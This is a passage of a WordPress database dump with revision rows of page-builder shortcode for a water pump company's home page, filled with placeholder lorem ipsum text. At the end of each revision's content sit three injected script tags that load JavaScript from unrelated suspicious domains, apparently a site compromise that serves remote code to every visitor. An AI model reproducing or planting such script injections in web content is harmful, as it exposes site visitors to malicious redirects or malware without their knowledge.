column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why Choose Us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">A bit good reasons</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"8%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Hot Looks</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Best Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>True Power</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]\r\n<h5>Happy Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/collection/430468/daily\" bg_position=\"center center\" bg_repeat=\"no-repeat\" bg_color=\"#454156\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"9%\" bottom_padding=\"9%\" id=\"intro\" row_name=\"Intro\" enable_gradient=\"true\" color_overlay=\"#0a0a0a\" color_overlay_2=\"rgba(102,102,102,0.74)\" gradient_direction=\"left_b_to_right_t\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Best Water Pump You Can Find\" font_container=\"tag:h1|font_size:83|text_align:center|color:%23ffffff|line_height:96px\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\" css=\".vc_custom_1485550874781{margin-top: -10px !important;}\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"100\"][vc_custom_heading text=\"We will help you a lot!\r\n\" font_container=\"tag:p|text_align:center|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_btn size=\"large\" button_style=\"regular\" button_color_2=\"Accent-Color\" icon_family=\"iconsmind\" url=\"#\" text=\"Show Me How\" icon_iconsmind=\"iconsmind-Triangle-ArrowRight\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 01:03:34','2018-01-30 01:03:34','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6685,1,'2018-01-30 01:04:44','2018-01-30 01:04:44','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>PT Dabinter Pompa Air</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"10\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10\" bottom_padding=\"40\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273960070{margin-bottom: 10px !important;}\"]\r\n<h5>Our Product</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Find our products\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273982432{margin-bottom: 10px !important;}\"]\r\n<h5>Frequently Asked Question</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Get the answer\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517274001996{margin-bottom: 10px !important;}\"]\r\n<h5>Article Area</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Tips and tricks\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why Choose Us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">A bit good reasons</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"8%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Hot Looks</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Best Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>True Power</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]\r\n<h5>Happy Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/collection/430468/daily\" bg_position=\"center center\" bg_repeat=\"no-repeat\" bg_color=\"#454156\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"9%\" bottom_padding=\"9%\" id=\"intro\" row_name=\"Intro\" enable_gradient=\"true\" color_overlay=\"#0a0a0a\" color_overlay_2=\"rgba(102,102,102,0.74)\" gradient_direction=\"left_b_to_right_t\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Best Water Pump You Can Find\" font_container=\"tag:h1|font_size:83|text_align:center|color:%23ffffff|line_height:96px\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\" css=\".vc_custom_1485550874781{margin-top: -10px !important;}\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"100\"][vc_custom_heading text=\"We will help you a lot!\r\n\" font_container=\"tag:p|text_align:center|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_btn size=\"large\" button_style=\"regular\" button_color_2=\"Accent-Color\" icon_family=\"iconsmind\" url=\"#\" text=\"Show Me How\" icon_iconsmind=\"iconsmind-Triangle-ArrowRight\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 01:04:44','2018-01-30 01:04:44','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6686,1,'2018-01-30 01:05:19','2018-01-30 01:05:19','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>PT Dabinter Pompa Air</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"100\" bottom_padding=\"10\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10\" bottom_padding=\"100\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273960070{margin-bottom: 10px !important;}\"]\r\n<h5>Our Product</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Find our products\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273982432{margin-bottom: 10px !important;}\"]\r\n<h5>Frequently Asked Question</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Get the answer\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517274001996{margin-bottom: 